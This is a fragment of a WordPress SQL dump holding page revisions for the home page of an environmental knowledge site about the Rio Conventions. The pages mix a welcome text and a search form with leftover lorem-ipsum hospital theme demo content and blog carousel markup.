<p>Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital</p>\n				<h3>\n					Emergency Departments\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					24/7 Services\n				</h3>\n								<p>Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.</p>\n			<h2>Reserve now in our hospital</h2>		\n		Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed		\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_563214.jpg\" title=\"\" alt=\"\" />											\n			<h3>Transplant Services</h3><p>Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_957412.jpg\" title=\"\" alt=\"\" />											\n			<h3>Pediatric Clinic</h3><p>Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_369542.jpg\" title=\"\" alt=\"\" />											\n			<h3>Dental Clinic</h3><p>Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n			<a href=\"#\" role=\"button\">\n						Register Now\n					</a>\n							saved hearts\n				+\n							happy patients\n				+\n							doctors number\n							saved lungs\n			<h2>What Our Patients Say</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n							Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_428339.jpg\" title=\"\" alt=\"\" />						\n													Mike Wright\n																			Patient #1\n							Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_324658.jpg\" title=\"\" alt=\"\" />						\n													Nancy Green\n																			Patient #3\n							Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_301284.jpg\" title=\"\" alt=\"\" />						\n													Frances Lopez\n																			Patient #2\n							Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_91227.jpg\" title=\"\" alt=\"\" />						\n													Nick Smith\n																			Patient #4\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-08 17:31:43','2019-11-08 17:31:43','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(401,1,'2019-11-08 17:32:50','2019-11-08 17:32:50','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n				<h3>\n					Cardiac Rehab\n				</h3>\n								<p>Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Gynecology\n				</h3>\n								<p>Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Symptom Check\n				</h3>\n								<p>Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Rehabilitation\n				</h3>\n								<p>Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					General Surgery\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					Pediatric Clinic\n				</h3>\n								<p>Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital</p>\n				<h3>\n					Emergency Departments\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					24/7 Services\n				</h3>\n								<p>Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.</p>\n			<h2>Reserve now in our hospital</h2>		\n		Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed		\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_563214.jpg\" title=\"\" alt=\"\" />											\n			<h3>Transplant Services</h3><p>Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_957412.jpg\" title=\"\" alt=\"\" />											\n			<h3>Pediatric Clinic</h3><p>Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_369542.jpg\" title=\"\" alt=\"\" />											\n			<h3>Dental Clinic</h3><p>Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n			<a href=\"#\" role=\"button\">\n						Register Now\n					</a>\n							saved hearts\n				+\n							happy patients\n				+\n							doctors number\n							saved lungs\n			<h2>What Our Patients Say</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n							Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_428339.jpg\" title=\"\" alt=\"\" />						\n													Mike Wright\n																			Patient #1\n							Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_324658.jpg\" title=\"\" alt=\"\" />						\n													Nancy Green\n																			Patient #3\n							Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_301284.jpg\" title=\"\" alt=\"\" />						\n													Frances Lopez\n																			Patient #2\n							Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_91227.jpg\" title=\"\" alt=\"\" />						\n													Nick Smith\n																			Patient #4\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-08 17:32:50','2019-11-08 17:32:50','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(402,1,'2019-11-08 17:34:12','2019-11-08 17:34:12','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h2>Latest from blog</h2>		\n		